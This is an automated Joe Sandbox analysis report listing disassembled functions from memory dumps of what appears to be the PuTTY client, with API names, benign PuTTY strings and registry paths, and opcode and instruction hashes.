                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressFreeLibraryProc
                      • String ID: MZx$api-ms-$ext-ms-
                      • API String ID: 3013587201-2431898299
                      • Opcode ID: 588d0943e1309766ace5999e7f173c8c72f43942c2027463cc149be416f78287
                      • Instruction ID: fe9013454fdc67f1b23fc33c41b8b242890491d087a4d832271c1451194a37c1
                      • Opcode Fuzzy Hash: 588d0943e1309766ace5999e7f173c8c72f43942c2027463cc149be416f78287
                      • Instruction Fuzzy Hash: 91413823B39612A1FA119B36A8546772B92BF44BE0F244539CD1DD7754EE3CEC85A308
                      Function 00007FF6785F9380 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemText
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
                      • API String ID: 3367045223-1831221297
                      • Opcode ID: 5a45def895cb1a708c8c6c847339d64b2b383093603e3f7d01d740163e329f99
                      • Instruction ID: 4c3726e12be72e452641605b1626b05a25d8ba286785053c7769da2fe71172d9
                      • Opcode Fuzzy Hash: 5a45def895cb1a708c8c6c847339d64b2b383093603e3f7d01d740163e329f99
                      • Instruction Fuzzy Hash: B331D723E28A42A0FA50DB32D9485BA2BA1BB58BC4FB14031DD0DC7795DE3CED45D308
                      Function 00007FF6786B5950 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                      • String ID:
                      • API String ID: 1330151763-0
                      • Opcode ID: dfaf525e84a8964243db45ad7a08f075fd56589bf58fcb89c567e3f2566f9169
                      • Instruction ID: cf3518d6cee85e68981d4a9e0b70a30210f2904854fc96d1d40a3dd6bcbdb599
                      • Opcode Fuzzy Hash: dfaf525e84a8964243db45ad7a08f075fd56589bf58fcb89c567e3f2566f9169
                      • Instruction Fuzzy Hash: B0C1B033B28A4295EB10DF75C4946AE3F61EB49BA8B210225EE1ED77D8CF38D951D304
                      Function 00007FF67869D1E0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 489COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID: 0$f$p$p
                      • API String ID: 3215553584-1202675169
                      • Opcode ID: 742ecf5f782f48d894291cd9e8debc9be088f5c6d3ec10e94422746121de430c
                      • Instruction ID: 996a78f3aff8e845a097353fd81df22d48dccc395cd86f6d6022d9f78cc97336
                      • Opcode Fuzzy Hash: 742ecf5f782f48d894291cd9e8debc9be088f5c6d3ec10e94422746121de430c
                      • Instruction Fuzzy Hash: 4C12A073E2D143A6FB206F28D14C67B6A61FB41754FA44139E799876C4CE3CEC80AB18
                      Function 00007FF6785F8A18 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CapsChooseDeviceFontRelease
                      • String ID: h
                      • API String ID: 554219020-2439710439
                      • Opcode ID: b484c44fd3baadefc3494cc91ab8e6aaf4eda1bb37a536306e2e396374a8010b
                      • Instruction ID: 0ab7a23aba68793980a8eb78174e8b888644f9d2f39394f403a0ab30893c018f
                      • Opcode Fuzzy Hash: b484c44fd3baadefc3494cc91ab8e6aaf4eda1bb37a536306e2e396374a8010b
                      • Instruction Fuzzy Hash: 5B71A473A1C68189FB608B35E4443BB7BA1EB65B94F240035DA8E83798CF7CE845DB45
                      Function 00007FF678610E60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: htons$getpeernameinet_ntoainet_ntop
                      • String ID: %s:%d$[%s]:%d
                      • API String ID: 1060964792-2542140192
                      • Opcode ID: 5b919b19cd1a092d9ae924ae209f265529ada2219a929c940ea57715b755d7c7
                      • Instruction ID: 2afec196960bafc42be01531d3d386bb2f07fea35e74be9189cbd31fedf04d05
                      • Opcode Fuzzy Hash: 5b919b19cd1a092d9ae924ae209f265529ada2219a929c940ea57715b755d7c7
                      • Instruction Fuzzy Hash: 5A31953292869296E7709F25E4053BB7BA0FB84740F608135DACE87796EF3CE845DB44
                      Function 00007FF6785D1F79 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      • Opcode ID: d187b52f7d9aabdd4469402f5d2f178aab838f39d50d32413d2db247b8c1bdbe
                      • Instruction ID: 7d1b525f9472c31d6bb52dda04eb73e6d8dbfbb60605e8d4db3d6ddc6650ba3a
                      • Opcode Fuzzy Hash: d187b52f7d9aabdd4469402f5d2f178aab838f39d50d32413d2db247b8c1bdbe
                      • Instruction Fuzzy Hash: 6131C123B2C68685FA608B30E4843B62B91EF90760F644134CAADC62D4DF7CED84EB14
                      Function 00007FF6785D209E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      • Opcode ID: ae483f04362e8e07ddd5c55a28912365e7810ae5eae7119404d0a43c000be4cd
                      • Instruction ID: 20eaa8f33e9972004565ec4c563f55df588e57ae21d90baaa9d751d62077b415
                      • Opcode Fuzzy Hash: ae483f04362e8e07ddd5c55a28912365e7810ae5eae7119404d0a43c000be4cd
                      • Instruction Fuzzy Hash: 5731AE33B2D68689FA608B30E4843B62B91AF90750F644034CE8DC6694CF7CFD84EB14
                      Function 00007FF6785D20B1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      • Opcode ID: 6ff9b6e3ccfa41eac43967d0f85491b21a13e8ae6f4853886475dc0a40d7efd6
                      • Instruction ID: a48cfa953d6bf323c27a8aaab90b089deac9ca7d3f43d8ad2ea24609fd1afd5d
                      • Opcode Fuzzy Hash: 6ff9b6e3ccfa41eac43967d0f85491b21a13e8ae6f4853886475dc0a40d7efd6
                      • Instruction Fuzzy Hash: 4231A023B2D68645FA608B30E4443B62B91AF90760F644134CAADC66E4DF7CFD85EB14
                      Function 00007FF6785D20C3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                      • String ID: (
                      • API String ID: 3620415003-3887548279
                      • Opcode ID: b8349ec93c4dddec6680e4932faa4de2be99d3b4fc5e745421a728c7658fe9e4
                      • Instruction ID: 3c3ebb8a4836dc25ab36365b6fef416889a9b863b67155cf4e5ef9ac58426430
                      • Opcode Fuzzy Hash: b8349ec93c4dddec6680e4932faa4de2be99d3b4fc5e745421a728c7658fe9e4
                      • Instruction Fuzzy Hash: E931AF23B2D68689FA608B30E4853BA2B91EF94750F644034CA9DC6694CF7CFD85EB14
                      Function 00007FF67860E090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF67860DA70: GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC25
                        • Part of subcall function 00007FF67860DA70: GetEnvironmentVariableA.KERNEL32 ref: 00007FF67860DC3B
                        • Part of subcall function 00007FF67860DA70: GetWindowsDirectoryA.KERNEL32 ref: 00007FF67860DCA5
                        • Part of subcall function 00007FF6785FAA80: CoCreateInstance.OLE32(?,?,?,?,?,?,00007FF67860E0A2), ref: 00007FF6785FAAB3
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860E0D5
                      • RegDeleteKeyA.ADVAPI32 ref: 00007FF67860E10C
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860E121
                        • Part of subcall function 00007FF67860E190: RegDeleteKeyA.ADVAPI32 ref: 00007FF67860E1B6
                        • Part of subcall function 00007FF67860E190: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF67860E0D2), ref: 00007FF67860E200
                      • RegDeleteKeyA.ADVAPI32 ref: 00007FF67860E16B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Close$Delete$CreateEnvironmentVariable$DirectoryInstanceWindows
                      • String ID: Software$Software\SimonTatham$Software\SimonTatham\PuTTY
                      • API String ID: 1055326402-1491235443
                      • Opcode ID: 81ef892001f2c2f1c0cb7cd0e59f28a03b7942c1b0957569705c6f07a305703b
                      • Instruction ID: 6ecb25de97927b5cb10dbfe561937d776d71513f5d6ec0a4af8f48f8a5f34bb6
                      • Opcode Fuzzy Hash: 81ef892001f2c2f1c0cb7cd0e59f28a03b7942c1b0957569705c6f07a305703b
                      • Instruction Fuzzy Hash: 7021D42AE3D11620FD19A77565013FB1A904F48BA4F704234DD1E8A7CBEE2CAC45E35C
                      Function 00007FF6785F62A0 Relevance: 12.1, APIs: 8, Instructions: 78windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID:
                      • API String ID: 3015471070-0
                      • Opcode ID: 06f3538c602ea54299b76f3686f6f10951f03e849c5c96e174d474a1f6d0ed2f
                      • Instruction ID: c6430b6f2c535257e992447bb882d210d589fb5ac12545cacd1d2a984ee39341
                      • Opcode Fuzzy Hash: 06f3538c602ea54299b76f3686f6f10951f03e849c5c96e174d474a1f6d0ed2f
                      • Instruction Fuzzy Hash: 4F21D622B245605AE3709B17BD10FB79695BB8AFC8F184125BC8D47F84CE7DCB069B48
                      Function 00007FF6785F89C3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ChooseColor
                      • String ID: !c->data$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$All Files (*.*)
                      • API String ID: 2281747019-3574149933
                      • Opcode ID: 2f349e4b6fcea049a0fd930034c1fded1ce6c352395f760d69894cb39ab3f3ff
                      • Instruction ID: 4cfd94384d8c5e998b06e55d20da88955dd475b5d8384ca11b09c287a925ec59
                      • Opcode Fuzzy Hash: 2f349e4b6fcea049a0fd930034c1fded1ce6c352395f760d69894cb39ab3f3ff
                      • Instruction Fuzzy Hash: F191B133918AC195FBA58B25E4443EA7BA4FF65754F200036CA8D83B94DF7DE881DB48
                      Function 00007FF67860DDA0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 159registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                        • Part of subcall function 00007FF678616890: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,?,?,00007FF67860DE03), ref: 00007FF6786168CB
                        • Part of subcall function 00007FF678616890: RegQueryValueExA.ADVAPI32 ref: 00007FF678616910
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860DEDE
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860DFF0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Close$QueryValue$Create
                      • String ID: Default Settings$Recent sessions$Software\SimonTatham\PuTTY\Jumplist$Software\SimonTatham\PuTTY\Sessions
                      • API String ID: 1827015023-773100466
                      • Opcode ID: 85f5938d20b66986dfa13e30285e8505ad84e392d4b75f2aaa6e1492787ba138
                      • Instruction ID: ebeba768d52736cafb5853308a8c30c25c1ed880c927bd0a10b54e1c6e063df1
                      • Opcode Fuzzy Hash: 85f5938d20b66986dfa13e30285e8505ad84e392d4b75f2aaa6e1492787ba138
                      • Instruction Fuzzy Hash: 0F51D823E3965261EA50DB32A50577B6B91AF85BC4F744231EE4D87796DF3CEC00A348
                      Function 00007FF6785D69C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 130windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DeleteMenu$Message
                      • String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
                      • API String ID: 1035315089-2786405544
                      • Opcode ID: b435416d0079812654ad5947054f8ee94bf0debb7ab9021b2e37498e67299442
                      • Instruction ID: b089c141516501d2553a9bdc9c82380d309935b9be90a2f795a2e16746153191
                      • Opcode Fuzzy Hash: b435416d0079812654ad5947054f8ee94bf0debb7ab9021b2e37498e67299442
                      • Instruction Fuzzy Hash: F0513D63A3C642A1FA40DB35E8512772F51AF98BD0F340432DD4DC7BA6DE2CE845AB48
                      Function 00007FF678604B20 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111fileCOMMON
